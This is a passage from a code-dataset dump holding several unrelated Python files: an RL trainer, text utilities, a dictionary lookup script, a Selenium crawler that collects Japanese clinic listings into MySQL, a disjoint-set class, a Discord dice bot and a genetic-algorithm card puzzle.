Iteration %i ************\"%itr)\n\n # collect trajectories, to be used for training\n #if isinstance(self.agent, DQNAgent):\n # only perform an env step and add to replay buffer for DQN\n self.agent.step_env()\n envsteps_this_batch = 1\n \n self.total_envsteps += envsteps_this_batch\n\n # train agent (using sampled data from replay buffer)\n if itr % print_period == 0:\n print(\"\\nTraining agent...\")\n all_logs = self.train_agent()\n\n if itr % print_period == 0:\n self.dump_density_graphs(itr)\n\n\n # log/save\n if itr % self.params['scalar_log_freq'] == 0:\n # perform logging\n print('\\nBeginning logging procedure...')\n self.perform_dqn_logging(all_logs)\n\n \n print(\"\\n\\n********** Training finished ************\")\n all_logs = self.train_agent()\n self.perform_dqn_logging(all_logs)\n\n def train_agent(self):\n all_logs = []\n for train_step in range(self.params['num_agent_train_steps_per_iter']):\n ob_batch, ac_batch, re_batch, next_ob_batch, terminal_batch = self.agent.sample(\n self.params['train_batch_size'])\n train_log = self.agent.train(ob_batch, ac_batch, re_batch, next_ob_batch, terminal_batch)\n all_logs.append(train_log)\n return all_logs\n\n\n def perform_dqn_logging(self, all_logs):\n last_log = all_logs[-1]\n\n episode_rewards = get_wrapper_by_name(self.env, \"Monitor\").get_episode_rewards()\n if len(episode_rewards) > 0:\n self.mean_episode_reward = np.mean(episode_rewards[-100:])\n if len(episode_rewards) > 100:\n self.best_mean_episode_reward = max(self.best_mean_episode_reward, self.mean_episode_reward)\n\n logs = OrderedDict()\n\n logs[\"Train_EnvstepsSoFar\"] = self.agent.t\n logs[\"Train_EpisodeSoFar\"] = self.agent.num_episodes\n print(\"Timestep %d\" % (self.agent.t,))\n print(\"Num Episodes %d\" % (self.agent.num_episodes,))\n if self.agent.num_episodes > 0:\n print(\"Success rate(%) = {0:.2f}\".format(self.agent.num_at_site * 100 /self.agent.num_episodes))\n\n logs[\"Num_Episode_reach_the_goal\"] = self.agent.num_at_site\n\n if self.mean_episode_reward > -5000:\n logs[\"Train_AverageReturn\"] = np.mean(self.mean_episode_reward)\n print(\"mean reward (100 episodes) %f\" % self.mean_episode_reward)\n if self.best_mean_episode_reward > -5000:\n logs[\"Train_BestReturn\"] = np.mean(self.best_mean_episode_reward)\n print(\"best mean reward %f\" % self.best_mean_episode_reward)\n\n if self.start_time is not None:\n time_since_start = (time.time() - self.start_time)\n print(\"running time %f\" % time_since_start)\n logs[\"TimeSinceStart\"] = time_since_start\n\n logs.update(last_log)\n\n sys.stdout.flush()\n\n for key, value in logs.items():\n print('\\t{} : {}'.format(key, value))\n print('Done logging...\\n\\n')\n\n\n def dump_density_graphs(self, itr):\n import matplotlib.pyplot as plt\n self.fig = plt.figure()\n filepath = lambda name: self.params['logdir']+'/curr_{}.png'.format(name)\n\n num_states = self.agent.replay_buffer.num_in_buffer - 2\n states = self.agent.replay_buffer.obs[:num_states]\n if num_states <= 0: return\n \n H, xedges, yedges = np.histogram2d(states[:,0], states[:,1], range=[[0., 1.], [0., 1.]], density=True)\n plt.imshow(np.rot90(H), interpolation='bicubic')\n plt.colorbar()\n plt.title('State Density')\n self.fig.savefig(filepath('state_density'), bbox_inches='tight')\n \n plt.clf()\n ii, jj = np.meshgrid(np.linspace(0, 1), np.linspace(0, 1))\n obs = np.stack([ii.flatten(), jj.flatten()], axis=1)\n density = self.agent.exploration_model.forward_np(obs)\n density = density.reshape(ii.shape)\n plt.imshow(density[::-1])\n 
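# (added note) the [::-1] flips the row order so the plot's origin roughly matches the rotated state-density histogram above\n        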
plt.colorbar()\n plt.title('RND Value')\n self.fig.savefig(filepath('rnd_value'))#, bbox_inches='tight')\n \n plt.clf()\n exploration_values = self.agent.dqn.qa_values(obs).mean(-1)\n exploration_values = exploration_values.reshape(ii.shape)\n plt.imshow(exploration_values[::-1])\n plt.colorbar()\n plt.title('predicted Q value')\n self.fig.savefig(filepath('predicted_q_value')) #, bbox_inches='tight')\n","sub_path":"expl_rnd/rl_trainer.py","file_name":"rl_trainer.py","file_ext":"py","file_size_in_byte":7310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"445858886","text":"# -*- coding: utf-8 -*-\nimport os\nimport string\nimport re\n\n\ndef read_file(path, skip_lines_num):\n with open(path, 'r', encoding='utf-8') as f:\n lines = [line.strip() for line in f.readlines()]\n lines = lines[skip_lines_num:]\n return lines\n\n\ndef write_file(path, write_data):\n with open(path, 'w', encoding='utf-8') as writer:\n writer.writelines(write_data)\n\n\ndef mkdir(path):\n if not os.path.isdir(path):\n os.mkdir(path)\n\n\ndef replace_punctuation(str):\n punctuation_string = string.punctuation\n for i in punctuation_string:\n str = str.replace(i, \"$\" + i + \"$\")\n return str\n\n\ndef remove_chinese_punctuation(line, strip_all=True):\n # 漢字的範圍為”\\u4e00-\\u9fa5“,這個是用Unicode表示的,所以前面必須要加”u“\n # 字元”r“的意思是表示忽略後面的轉義字元,這樣簡化了後面正則表示式裡每遇到一個轉義字元還得挨個轉義的麻煩\n if strip_all:\n rule = re.compile(r\"[^a-zA-Z0-9\\u4e00-\\u9fa5]\", re.U)\n line = rule.sub('', line)\n else:\n punctuation = \"\"\"!?。"#$%&'()*+-/:;<=>@[\]^_`{|}~⦅⦆「」、、〃》「」『』【】〔〕〖〗〘〙〚〛〜〝〞〟〰〾〿–—‘'‛“”„‟…‧﹏\"\"\"\n re_punctuation = \"[{}]+\".format(punctuation)\n line = re.sub(re_punctuation, \"\", line)\n return line.strip()\n\n\ndef remove_unknown_word(sentence):\n unknow_list = \"、◦™‑•\"\n sentence = sentence.replace(\",\", \",\")\n sentence = sentence.translate(str.maketrans('', '', unknow_list))\n return sentence\n\n\ndef remove_items_in_list(test_list, item):\n # remove the item for all its occurrences\n test_list = list(filter(lambda x: x != item, test_list))\n # print(test_list)\n return test_list\n\n\ndef check_item_in_list(str, list):\n result = \"notMatch\"\n for target in list:\n if target in str:\n result = target\n return result\n# test area\n# a=\"Type-(I) 2.48\"\n# print(replace_punctuation(a))\n\n# str=remove_unknown_word(\"、CD3、\")\n# print(str)\n","sub_path":"tool_box.py","file_name":"tool_box.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"266869434","text":"#!/usr/bin/python3\n#coding=utf-8\n\nimport urllib\nimport sys\nimport getopt\nfrom bs4 import BeautifulSoup\n\n\nclass dic():\n def __init__(self, csv_filename=\"/home/bacon/Projects/small_projects/python/NGNG.csv\"):\n self.wordlist = []\n self.file_old = []\n self.file_in = []\n self.csv_file=csv_filename\n self.csvlist = []\n with open(self.csv_file,'r') as cfile:\n self.csvlist = cfile.readlines()\n for i in range(0,len(self.csvlist)-1):\n self.csvlist[i] = self.csvlist[i][:-1]\n self.csvlist[i] = self.csvlist[i].replace(\" \",\"\").replace(\"<\",\" \").replace(\"n.\",\"<br>n.\").replace(\"v.\",\"<br>v.\").replace(\"a.\",\"<br>adj.\").replace(\"adv.\",\"<br>adv.\")\n\n def trans(self, word):\n \"\"\"输入英语单词, 返回单词的翻译.翻译来自爱词霸\"\"\"\n website = \"http://www.iciba.com/\"\n url = website+word\n html = urllib.request.urlopen(url).read().decode('utf-8')\n soup = BeautifulSoup(html,\"lxml\")\n cont = soup.find_all('ul')[1]\n stst = 
\"\"\n for tag in cont.find_all(class_=\"prop\"):\n tag.string = \"<br>\" + tag.string\n for string in cont.stripped_strings:\n stst = stst + string\n return stst.replace(\"\\n\",\"\").replace(\" \",\"\")\n\n def fileread(self, filename):\n \"\"\"在文件中读取全部单词, 忽略有空格的行\"\"\"\n with open(filename, 'r') as fi:\n while 1:\n word = fi.readline().replace(\"\\n\", '')\n if not word:\n return -1\n else:\n self.file_in.append(word) # 原文件, 列表\n if ' ' in word:\n self.wordlist.append(0) #行中有空格就加0\n else:\n self.wordlist.append(word)\n\n def filewrite(self, filename, number=0):\n \"\"\"输出\"\"\"\n total = len(self.wordlist) # 单词总数\n i = 0 # 目前进度\n iciba = 0 # 爱词霸查词数目\n iciba_list = []\n if number != 0:\n with open(filename, 'r') as fi:\n self.file_old = fi.readlines()\n with open(filename, \"w+\") as fi:\n while 1:\n print(\"%d/%s\" % (i+1, total))\n if self.wordlist[i] != 0 and i >= number:\n wordin = self.find_in_csv(self.wordlist[i])\n if self.wordlist[i] == wordin:\n print(\"%d!\" % (i+1))\n iciba += 1\n iciba_list.append(i+1)\n fi.write(self.wordlist[i]+' '+self.trans(self.wordlist[i])+'\\n')\n else:\n fi.write(wordin)\n elif i >= len(self.file_old):\n fi.write(self.file_in[i])\n else:\n fi.write(self.file_old[i])\n i += 1\n sys.stdout.flush()\n if i == total:\n print(iciba,iciba_list)\n break\n\n def find_in_csv(self, word):\n lili = [] \n for line in self.csvlist:\n if word == line[0:len(word)] or word in line:\n lili.append(line)\n for line in lili:\n if word == line[0:len(word)] and line[len(word)] == ' ':\n return(line+'\\n')\n for line in lili:\n if word in line:\n return(line+'\\n')\n if lili == []:\n return(word)\n\n def main(self, file_in, file_out, number):\n \"\"\"单词表文件, 输出目标文件, 断点续输出行号\"\"\"\n if file_in == '' or file_out == '':\n print(\"No file\")\n sys.exit()\n self.fileread(file_in)\n self.filewrite(file_out, number)\n\nopts, args = getopt.getopt(sys.argv[1:], \"hi:o:n:\")\ninput_file = \"\"\noutput_file = \"\"\ncontinue_number = 0\nfor op, value in opts:\n if op == \"-i\":\n input_file = value\n elif op == \"-o\":\n output_file = value\n elif op == \"-n\":\n continue_number = int(value)\n elif op == \"-h\":\n print(\"\"\"-i\\t输入文件\\n-o\\t输出文件\\n-n\\t断点续输出行号\\n-h\\t显示帮助\\n\"\"\")\n sys.exit()\na = dic()\na.main(input_file, output_file, continue_number)\n","sub_path":"python/dic.py","file_name":"dic.py","file_ext":"py","file_size_in_byte":4814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"553223594","text":"import time\nfrom numpy.random import *\nimport urllib.request\nimport urllib.parse\nimport bs4\nimport pandas as pd\nimport os\nimport sys\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\nimport codecs\nimport pickle\nimport re\nimport threading\nimport mysql.connector\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nfrom joblib import Parallel, delayed\nfrom contextlib import closing\nfrom concurrent.futures import ThreadPoolExecutor, as_completed, wait\n\nSTART_ID = 0\nEND_ID = 150000\n\nsys.setrecursionlimit(1000000)\nPATH = os.path.dirname(os.path.abspath(__file__))\nDB = 'db'\nCLINIC_TABLE = 'clinics'\nURL_STATUS_TABLE = 'url_status'\nCLINIC_STATUS_TABLE = 'clinic_status'\nURL_TABLE = 'urls'\nCLINIC_HTML_TABLE = 'clinic_html'\nTIMEOUT = 30\n\nTRAVEL_TIME_REPATTER = re.compile(r'[0-9]+.m')\n\nAREAS = pd.read_csv('../util/Pref-JP-EN.csv')\nBASE_URL = 
\"https://byoinnavi.jp\" # BASE_URL/todofuken/category_id\nPROCESS_LIMIT = 5\nTHREAD_NUM = 50\nserch_url_stack = []\n\ndef extract_clinic_url(soup):\n res = []\n clinic_list = soup.findAll('tr', {'class': 'clinic corp_opened'})\n\n for clinic in clinic_list:\n clinic_url = BASE_URL + clinic.findAll('div', {'class': 'clinic_title'})[0].findAll('a')[0].get('href')\n res.append(clinic_url)\n \n return res\n\n\ndef extract_data(clinic):\n name = clinic.findAll('span', {'itemprop': 'name'})[0].getText(strip=True)\n\n disease_area = ''\n if len(clinic.findAll('dd', {'class': 'corp-info-ext__curable-diseases'}))> 0:\n disease_area = clinic.findAll('dd', {'class': 'corp-info-ext__curable-diseases'})[0].getText(strip=True)\n \n departments = clinic.findAll('td', {'class': 'clinic_info_cate'})[0].a\n department = ''\n for d in departments:\n department += d.string + ','\n\n nearest_station = ''\n travel_time = ''\n if len(clinic.findAll('div',{'class': 'clinic_map_memo word_break'}))> 0 and len(clinic.findAll('div',{'class': 'clinic_map_memo word_break'})[0].findAll('a')) > 0:\n nearest_station = clinic.findAll('div',{'class': 'clinic_map_memo word_break'})[0].findAll('a')[0].getText(strip=True)\n travel_time = TRAVEL_TIME_REPATTER.findall(clinic.findAll('div',{'class': 'clinic_map_memo word_break'})[0].getText(strip=True))[0]\n\n area = clinic.findAll('div', {'class': ['clinic_addr1', 'corp__address']})[0].findAll('span', {'itemprop': 'addressRegion'})[0].getText(strip = True)\n locality = clinic.findAll('div', {'class': ['clinic_addr1', 'corp__address']})[0].findAll('span', {'itemprop': 'addressLocality'})[0].getText(strip = True)\n streetAddress = clinic.findAll('div', {'class': ['clinic_addr1', 'corp__address']})[0].findAll('span', {'itemprop': 'streetAddress'})[0].getText(strip = True)\n addr = area + locality + streetAddress\n\n tel = clinic.findAll('td', {'class': 'clinic_info_tel'})[0].getText(strip=True)\n url = ''\n if len(clinic.findAll('td', {'class': 'clinic_info_url'})) > 0:\n url = clinic.findAll('td', {'class': 'clinic_info_url'})[0].findAll('a')[0].get('href')\n\n #print('name: ' + name)\n #print('addr: ' + addr)\n #print('tel: ' + tel)\n #print('url: ' + url)\n #print('department: ' + department)\n #print('disease_area: ' + disease_area)\n #print('nearest_station: ' + nearest_station)\n #print('travel_time: ' + travel_time)\n #print('----------------------')\n res = [name, area, addr, disease_area, department, nearest_station, travel_time, url]\n\n return res\n\ndef get_browser():\n # return webdriver.PhantomJS(service_args=None, service_log_path=os.path.devnull )\n options = Options()\n options.add_argument('--headless')\n return webdriver.Chrome(chrome_options=options)\n\ndef download_html(browser, url):\n print(\"downloading...\" + url)\n\n browser.get(url)\n html = browser.page_source.encode(\"utf-8\")\n\n return html\n\ndef download(browser, url):\n print(\"downloading...\" + url)\n\n browser.get(url)\n html = browser.page_source.encode(\"utf-8\")\n soup = bs4.BeautifulSoup(html, \"lxml\")\n\n next_page_url = get_next_page_url(soup)\n\n return [soup, next_page_url]\n\ndef get_next_page_url(soup):\n last_element = ''\n if len(soup.findAll(\"div\", {\"class\": \"page_next\"})) > 0:\n last_element = soup.findAll(\"div\", {\"class\": \"page_next\"})[0].findAll('a')[-1]\n else:\n return None\n\n if last_element.getText(strip=True) == '>次へ':\n return BASE_URL + last_element.get('href')\n else:\n return None\n\ndef print_date(date):\n for key, val in date.items():\n print(key + ': ' 
+ val)\n\ndef insert_clinic_db(conn, data):\n    print(data)\n    c = conn.cursor()\n    sql = 'insert into ' + CLINIC_TABLE + ' (id, name, area, addr, disease_area, department, nearest_station, travel_time, url) values (%s,%s,%s,%s,%s,%s,%s,%s,%s)'\n    c.execute(sql, tuple(data))\n    conn.commit()\n\ndef insert_clinic_html_db(conn, id, html):\n    ##print(type(id))\n    #print(type(html))\n    c = conn.cursor()\n    sql = 'insert into ' + CLINIC_HTML_TABLE + ' (id, html, is_finished) values (%s,%s, 0) '\n    c.execute(sql, (id, html))\n    conn.commit()\n\ndef insert_url_list(conn, url_list):\n    c = conn.cursor()\n    for url in url_list:\n        sql = 'insert into urls(url, is_finished) values (%s, %s)'\n        c.execute(sql, [url, 0])\n        #print(url)\n    conn.commit()\n\ndef update_status_db(conn, area, page, is_finished):\n    data = [page, is_finished, area]\n    c = conn.cursor()\n    sql = 'update ' + URL_STATUS_TABLE + ' SET page = %s, is_finished = %s where id = %s'\n    c.execute(sql, data)\n    conn.commit()\n\ndef update_clinic_status_db(conn, id):\n    c = conn.cursor()\n    sql = 'update ' + CLINIC_STATUS_TABLE + ' SET progress = %s where id = %s'\n    c.execute(sql, [id, 1])\n    conn.commit()\n\ndef get_page(conn, area):\n    c = conn.cursor()\n    sql = 'select is_finished, page from ' + URL_STATUS_TABLE + ' where id = \'' + area + '\''\n    c.execute(sql)\n    data = c.fetchall()[0]\n    return data\n\ndef get_id(conn):\n    c = conn.cursor()\n    sql = 'select id from ' + CLINIC_STATUS_TABLE\n    c.execute(sql)\n    data = c.fetchall()[0][0]\n    #print(data)\n    return data\n\ndef get_url(conn, id):\n    c = conn.cursor()\n    sql = 'select url from ' + URL_TABLE + ' where id = %s'\n    c.execute(sql, [id])\n    data = c.fetchall()[0][0]\n    return data\n\ndef init_url_status_db(conn):\n    c = conn.cursor()\n    for i in range(0,47):\n        area = AREAS.iloc[i, 1].lower()\n        sql = 'insert into ' + URL_STATUS_TABLE + ' (id, page, is_finished) values (%s,%s,%s)'\n        c.execute(sql, (area, 1, 0))\n    conn.commit()\n\ndef init_url_status(conn, area):\n    c = conn.cursor(buffered=True)\n    sql = 'select * from ' + URL_STATUS_TABLE + ' where id = \'' + area + '\''\n    # sql = "select * from url_status where id = 'ehime'"\n    c.execute(sql)\n    if len(c.fetchall()) == 0:\n        sql = 'insert into ' + URL_STATUS_TABLE + ' (id, page, is_finished) values (%s,%s, %s)'\n        c.execute(sql, (area, 1, 0))\n        conn.commit()\n\ndef get_clinic_html(conn, id):\n    c = conn.cursor()\n    sql = 'select html from ' + CLINIC_HTML_TABLE + ' where id = %s'\n    c.execute(sql, [id])\n    data = c.fetchall()[0][0]\n    return data\n\ndef update_clinic_html_status(conn, id):\n    c = conn.cursor()\n    sql = 'update ' + CLINIC_HTML_TABLE + ' set is_finished = 1 where id = %s'\n    c.execute(sql, [id])\n    conn.commit()\n    return\n\ndef get_clinic_url_list():\n    with closing(mysql.connector.connect(user='root', host='127.0.0.1', database=DB)) as conn:\n        c = conn.cursor(buffered=True)\n        sql = 'select id, url from ' + URL_TABLE + ' where is_finished = 0 and id >= %s and id < %s ;'\n        c.execute(sql, (START_ID, END_ID))\n        res = c.fetchall()\n    return res\n\ndef update_url_status_done(conn, id):\n    c = conn.cursor()\n    sql = 'update ' + URL_TABLE + ' SET is_finished = %s where id = %s'\n    c.execute(sql, [1, id])\n    conn.commit()\n    \n\n\ndef crawl_clinic_page(urls):\n    with closing(mysql.connector.connect(user='root', host='127.0.0.1', database=DB)) as conn:\n        #print(\"=== start sub thread ===\")\n        browser = get_browser()\n        for url_data in urls:\n            id = url_data[0]\n            url = url_data[1]\n            #print(\"id, url: \" + str(id) + ', ' + url)\n            # time.sleep(0.001 * rand())\n            # soup,_ = download(browser, url)\n            # 
try:\n # data = extract_data(soup)\n # data.insert(0, id)\n # print(data)\n # insert_clinic_db(conn, data)\n # except mysql.connector.errors.IntegrityError:\n # print(\"duplicarte key\")\n data = download_html(browser, url)\n insert_clinic_html_db(conn, id, data)\n\n update_url_status_done(conn, id)\n\n browser.quit()\n\ndef scrape_clinic_pages(ids):\n with closing(mysql.connector.connect(user='root', host='127.0.0.1', database=DB)) as conn:\n for id in ids:\n html = get_clinic_html(conn, id)\n soup = bs4.BeautifulSoup(html, \"lxml\")\n data = extract_data(soup)\n data.insert(0,id)\n insert_clinic_db(conn, data)\n update_clinic_html_status(conn, id)\n\ndef run(area):\n with closing(mysql.connector.connect(user='root', host='127.0.0.1', database=DB)) as conn:\n print(\"=== start sub thread for '\" + area + \"' ===\")\n init_url_status(conn, area)\n url = BASE_URL + '/' + area\n\n is_finished, page = get_page(conn, area)\n browser = get_browser()\n # is_finished = 1 # for skip get URL LIST\n\n # URL LIST \n if is_finished is 0:\n while True:\n soup, next_page_url = download(browser, url + '?p=' + str(page))\n insert_url_list(conn, extract_clinic_url(soup))\n\n print(str(next_page_url))\n\n if next_page_url is None:\n update_status_db(conn, area, page, 1)\n break\n else:\n page += 1\n update_status_db(conn, area, page, 0)\n \n browser.quit()\n \n # # CLINIC DATA\n # id = get_id(conn)\n # while True:\n # url = get_url(conn, id)\n # if url is not None:\n # soup, _ = download(url)\n # insert_clinic_db(conn, extract_data(soup))\n\n # id += 1\n # print(id)\n # update_clinic_status_db(conn, id)\n # else:\n # break\n\ndef chunked(iterable, n):\n return [iterable[x:x + n] for x in range(0, len(iterable), n)]\n\ndef clinic_crawl_process(url_list):\n with ThreadPoolExecutor(max_workers=THREAD_NUM) as pool:\n pool = ThreadPoolExecutor(max_workers=THREAD_NUM)\n chunked_url_list = chunked(url_list, len(url_list)//THREAD_NUM)\n print(len(chunked_url_list))\n\n # for arr in chunked(url_list, THREAD_NUM):\n res = pool.map(crawl_clinic_page, chunked_url_list)\n wait(res)\n\n print(\"submit end\")\n\n\nif __name__=='__main__':\n print(\"=== main thread start ===\")\n url_list = get_clinic_url_list()\n chunked_url_list = chunked(url_list, len(url_list)//PROCESS_LIMIT)\n\n # result = Parallel(n_jobs=-1)([delayed(run)(AREAS.iloc[i,1].lower())for i in range(0, 47)])\n # result = Parallel(n_jobs=-1)([delayed(clinic_crawl_process)(chunked_url_list[i])for i in range(0, PROCESS_LIMIT)])\n # result = Parallel(n_jobs=-1)([delayed(crawl_clinic_page)(chunked_url_list[i])for i in range(0, PROCESS_LIMIT)])\n crawl_clinic_page(chunked_url_list[0])\n # scrape_clinic_pages([1])\n\n\n \n print(\"=== main thread ended ===\")\n","sub_path":"20180228_byoinnavi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"479346770","text":"# <<BEGIN-copyright>>\n# Copyright 2022, Lawrence Livermore National Security, LLC.\n# See the top-level COPYRIGHT file for details.\n# \n# SPDX-License-Identifier: BSD-3-Clause\n# <<END-copyright>>\n\"\"\"\nDefines the NuclearPlusCoulombInterference class which is used to store the elastic scattering reaction for a protare\nwith a charged particle as the projectile where only the 'nuclear + interference' data are included. Ergo, the \nRutherford scattering term is ignored. 
This reaction is equivalent to the ENDL C=9 reaction.\n\"\"\"\n\nfrom LUPY import ancestry as ancestryModule\n\nfrom .. import enums as enumsModule\nfrom .. import outputChannel as outputChannelModule\nfrom ..reactions import reaction as reactionModule\n\n\nclass NuclearPlusCoulombInterference( ancestryModule.AncestryIO ) :\n    \"\"\"\n    This class has only one member which is the 'nuclear + interference' reaction.\n    \"\"\"\n\n    moniker = 'nuclearPlusCoulombInterference'\n    ancestryMembers = ( 'reaction', )\n\n    def __init__(self, label):\n\n        ancestryModule.AncestryIO.__init__(self)\n\n        self.__reaction = reactionModule.Reaction(label, enumsModule.Genre.twoBody, 2)\n        self.__reaction.setAncestor( self )\n\n    @property\n    def reaction( self ) :\n\n        return( self.__reaction )\n\n    def toXML_strList( self, indent = '', **kwargs ) :\n\n        indent2 = indent + kwargs.get( 'incrementalIndent', '  ' )\n\n        XMLList = [ '%s<%s>' % ( indent, self.moniker ) ]\n        XMLList += self.__reaction.toXML_strList( indent2, **kwargs )\n        XMLList[-1] += '</%s>' % self.moniker\n\n        return( XMLList )\n\n    @classmethod\n    def parseNodeUsingClass(cls, node, xPath, linkData, **kwargs):\n\n        instance = cls(node[0].get('label'))\n        instance.reaction.parseNode(node[0], xPath, linkData, **kwargs)\n\n        return instance\n","sub_path":"fudge/processing/nuclearPlusCoulombInterference.py","file_name":"nuclearPlusCoulombInterference.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
{"seq_id":"9062091","text":"\n\nclass DisJointSet(object):\n    def __init__(self, n):\n        self.parent = []\n        self.rank = []\n        self.elements = n\n        self.make()\n\n    # Creates n sets with single item in each\n    def make(self):\n        # Initially, all elements are in their own set.\n        self.parent = [i for i in range(self.elements)]\n        self.rank = [0] * self.elements\n\n    # Returns representative of x's set\n    def find(self, x):\n        # Finds the representative of the set that x is an element of\n        if self.parent[x] != x:\n            # if x is not the parent of itself Then x is not the representative of its set,\n            # so we recursively call Find on its parent and move x's node directly under the\n            # representative of this set\n            self.parent[x] = self.find(self.parent[x])\n\n        return self.parent[x]\n\n    def union(self, x, y):\n        # Find representatives of two sets\n        x_root = self.find(x)\n        y_root = self.find(y)\n\n        # Elements are in the same set, no need to unite anything.\n        if x_root == y_root:\n            return\n\n        # If x's rank is less than y's rank\n        if self.rank[x_root] < self.rank[y_root]:\n            # Then move x under y so that depth of tree remains less\n            self.parent[x_root] = self.parent[y_root]\n        # Else if y's rank is less than x's rank\n        elif self.rank[y_root] < self.rank[x_root]:\n            # Then move y under x so that depth of tree remains less\n            self.parent[y_root] = self.parent[x_root]\n        else: # if ranks are the same\n            # Then move y under x (doesn't matter which one goes where)\n            self.parent[y_root] = self.parent[x_root]\n            # And increment the result tree's rank by 1\n            self.rank[x_root] += 1\n\n\ndus = DisJointSet(5)\n\n# 0 is a friend of 2\n# dus.union(0, 2)\n# 4 is a friend of 2\n# dus.union(4, 2)\n# 3 is a friend of 1\n# dus.union(3, 1)\n\n# Check if 4 is a friend of 0\n# is_friend = dus.find(4) == dus.find(0)\n\n# print(\"0 is friend of 4 {0}\".format(is_friend))\n\n# Check if 1 is a friend of 0\n\n# print(\"1 is friend of 0 {0}\".format(dus.find(1) == 
dus.find(0)))\n\n\n","sub_path":"python/disjoint_set/disjoint_set.py","file_name":"disjoint_set.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"185462647","text":"import random\nimport re\n\nfrom discord.ext import commands\n\n\nclass Dice(commands.Cog, name=\"骰子功能\"):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def roll(self, ctx, *args):\n \"\"\"擲骰子\n\n 範例:\n roll 3d6\n roll 3d6+10 測試骰\"\"\"\n try:\n dice_string = args[0]\n dice_comment = \" \".join(args[1:])\n (total, rolls, modifier) = self._roll(dice_string)\n response = \"{}\\nroll {}\".format(ctx.author.mention, dice_string)\n if dice_comment:\n response += \"\\n{}\".format(dice_comment)\n response += \"\\n{} + ({}) = {}\".format(rolls, int(modifier), total)\n except:\n response = \"指令錯誤:\\n使用範例:roll 3d6+10 測試骰\"\n await ctx.send(response)\n\n @commands.command()\n async def coc(self, ctx, *args):\n \"\"\"coc 技能判定\n\n 範例:\n coc 50\n coc 50 聆聽\"\"\"\n try:\n dc = int(args[0])\n comment = \" \".join(args[1:])\n (total, rolls, modifier) = self._roll(\"1d100\")\n if total <= 2:\n result = \"大成功\"\n elif total >= 99:\n result = \"大失敗\"\n elif total <= dc:\n result = \"成功\"\n else:\n result = \"失敗\"\n response = \"{}\\n{} (目標值:{},擲骰結果:{})\".format(ctx.author.mention, result, dc, total)\n if comment:\n response += \"\\n{}\".format(comment)\n except:\n response = \"{}\\n指令錯誤:\\n使用範例:coc 50\"\n await ctx.send(response)\n\n def _roll(self, roll_string):\n \"\"\"roll dice\n Args:\n (str) dice_string (example: \"1d20+4\")\n Return:\n (tuple)\n - (int) sum - final result of rolls and modifier\n - (list of int) rolls - dice roll results\n - (str) modifier - parsed modifier\n \"\"\"\n matched_groups = re.match(\"(\\d+)d(\\d+)([\\+|\\-]\\d+)?\", roll_string)\n dice_count = matched_groups.groups()[0]\n dice_type = matched_groups.groups()[1]\n dice_modifier = matched_groups.groups('+0')[2] # use \"+0\" in default if not matched\n dice_results = []\n for _ in range(int(dice_count)):\n dice_results.append(random.randint(1, int(dice_type)))\n dice_sum = sum(dice_results) + int(dice_modifier)\n return (dice_sum, dice_results, dice_modifier)\n","sub_path":"src/dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"617700506","text":"\r\nimport unittest\r\n\r\nfrom Button import Button\r\n\r\nclass ButtonTest(unittest.TestCase):\r\n\r\n def test_lamp_turn_on(self):\r\n b = Button()\r\n b.set_condition(True)\r\n self.assertEqual(\"on\", b.lamp.state())\r\n\r\n def test_poll(self):\r\n self.fail(\"This test check Switch interface!\")\r\n\r\nif __name__ == \"__main__\": unittest.main()","sub_path":"dip/py/buttons/step_0/ButtonTest.py","file_name":"ButtonTest.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"433528836","text":"\ndef solution(arr):\n answer = 1\n tmp = dict()\n arr.sort()\n for i in arr:\n cnt = 1\n while 1:\n if i in tmp:\n cnt += tmp[i].pop()\n if tmp[i] == []:\n tmp.pop(i)\n i *= 2\n else:\n tmp[i] = [cnt]\n break\n answer = sorted(tmp.items(), key=lambda x: x[1])[-1][1]\n return answer\n\n\nweights = 
[2,2,2,2,3,3,5,6]\nprint(solution(weights))\n","sub_path":"algo_py/kakao/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
{"seq_id":"33782306","text":"from random import *\r\n\r\ndef product(_list):\r\n    result = 1\r\n    for number in _list:\r\n        result *= number\r\n    return result\r\n\r\ndef summ(_list):\r\n    result = 0\r\n    for number in _list:\r\n        result += number\r\n    return result\r\n\r\nclass Organism:\r\n    def __init__(self, chromosome=\"random\"):\r\n        if chromosome == \"random\":\r\n            self.chromosome = self.randomChromosome()\r\n        else:\r\n            self.chromosome = chromosome\r\n        \r\n        self.fitness = self.fitnessFunction()\r\n\r\n    def __str__(self):\r\n        return str(self.chromosome) + \" \" + str(self.fitness)\r\n\r\n    def cardNotation(self):\r\n        sumPile = \"\"\r\n        mulPile = \"\"\r\n\r\n        for gene in range(len(self.chromosome)):\r\n            if self.chromosome[gene] == 0:\r\n                sumPile += str(gene + 1) + \"+\"\r\n            else:\r\n                mulPile += str(gene + 1) + \"*\"\r\n\r\n        return sumPile[:-1] + \" = 36 \" + mulPile[:-1] + \" = 360\"\r\n\r\n    def fitnessFunction(self):\r\n        addGenes = []\r\n        mulGenes = []\r\n        \r\n        for gene in range(len(self.chromosome)):\r\n            if self.chromosome[gene] == 0:\r\n                addGenes.append(gene + 1)\r\n            else:\r\n                mulGenes.append(gene + 1)\r\n\r\n        addValue = summ(addGenes)\r\n        mulValue = product(mulGenes)\r\n\r\n        return 